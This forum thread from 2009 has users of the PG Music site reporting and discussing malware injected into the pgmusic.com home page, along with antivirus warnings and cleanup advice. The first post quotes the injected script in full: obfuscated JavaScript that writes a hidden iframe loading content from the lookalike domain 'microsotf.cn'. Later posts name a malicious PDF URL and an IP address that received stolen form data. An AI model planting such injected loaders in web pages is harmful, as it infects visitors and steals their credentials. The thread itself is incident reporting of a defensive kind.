If you look at the source for the pgmusic.com home page, do you see the following line?:

<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.

Just curious if this is something happening on my end or if it's actually in the page itself.

Thanks.

yes i see it in the source.

are you the Grayson who works at PG?

When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.

I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.

R.

"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."

I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.

Yeah, Avast jumped right in as soon as looked at the homepage - needs attention!
I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even suppose to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.

Avast caught mine right away when I went to the page this morning. Since then it has not come up again.

It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.

Don S.

Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.

BTW I don't work for PG Music, Mr Tuna.

Hi
I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at.
The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn

Brian Cadoret

I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it.

I know of business sites that took a few weeks getting rid of it, only to get it again.
Keep your AV updated.
Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of.

Here's a description of one such javascript redirecor -

After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.

Having unfamiliar proccesses running like the above mentioned "9129837.exe " is not a good sign..

My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.

Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.

So, we think this thing is a keystroke logger?

R.

Richard,

I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.

Don S.

It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it
use SPYBOT quickly

I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.

It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans

I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine.
If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running...
I tested a couple infected sites and closely watched the results.
It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source seperate from the main site.

A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection.
It's an ugly ugly situation once it gets in.
I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.

As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted seperately.

If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code.
It will not be easy to see using the 'view source' but will easy to see using the source codes on the server.
Also trojans seems to like the 'include' folders and javascript folders.
This, however is much more rare than the current version that is infecting sites.

I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..

just trying to help with what I have seen.

I'm running Linux and just safely saved the 25.8 KB malware download to disk. It's name is 955.pdf, so perhaps it it using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4.
(http://olegvolk.livejournal.com/628779.html)

If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.

By the way, I urge all of you to only use Linux for surfing the internet.

Linux is fine until you run into a virus designed to exploit Linux.
There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.

I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit windows, but it is by no means completely safe.

I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also!
Congrats on outsmarting this one, and thanks for the extra efforts.
Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others.
If you are interested in helping for these types of things, check out badwarebusters.org

Has the pgmusic homepage been fixed?

I used the Live Help to ask. This is the reply I got:

"Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you?
you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet?
you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it.
Jareth: I'm currently asking our webmaster
Jareth: give me one moment
you: thank you, Jareth.
Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion
you: okay. Thanks a lot.
you: have a great day.
Jareth: you're welcome, bye
you: END CHAT
Jareth: you too

Gary

JBlatz - what makes you think that the malware is called 955.pdf?
That appears to be a valid program/ format.
http://www.pdf995.com/

What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.

Hi
Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.

Brian Cadoret

This is what it is/was

7/6/2009 11:24:42 AM SYSTEM 312 Sign of "JS:Pdfka-JV [Expl]" has been found in "http://microsotf.cn/img/pfqd.php" file.

It is an infected PDF file. I use Firefox with Nitro PDF tool. The minute Avast flagged this Nitor opened and asked what to do with this file.

Yes, it looks like a line of code got injected to our web page from somewhere external on the Internet (via a vulnerability in the system that has since been fixed), that was wanting to download a PDF file. (reportedly PDF files can be malicious if you have an older version of your PDF reader)

Apparently these things hunt the internet looking for specific vulnerabilities.

This has been removed fron the web page, and things should be back to normal now.

From a google search, if the PDF was downloaded, and managed to infect, it most likely would be delivering unwanted popup ads and possibly other things. You should do a adware/virus scan to make sure things are OK.

There are many good spyware/virus programs, including free scanners (e.g. http://www.kaspersky.com/virusscanner)
I apologize for this inconvenience.

Thanks Peter, it's good to hear its handled

Peter,
It bothers me that you have to apologize for the inconvenience, since you are doing nothing more than running your business. The people who write these things should be found, prosecuted, and then punished for the harm they cause.

While this may have not been anything other than an infected .pdf file, it may have caused loss of business, loss of time for customers, loss of revenue for customers, loss of time for your employees and such.

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

Thanks for getting it cleared up, Peter.

Gary

Quote:

---

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

---

the millions or possibly billions of dollars in lost man-hours alone probably far exceeds all other forms of 'piracy' already. to bad someone couldn't come up with a plan to root these people out then prosecute them to the fullest extent of the law. microsoft puts a bounty on their heads but i don't know how affective that has been. maybe a portion of software sales should go into a fund dedicated to exposing these 'terrorists.' the money and effort we all spend on av software would be a good start toward the fund.

just 2 cents from a victim of a trojan that put me out of business with band in a box.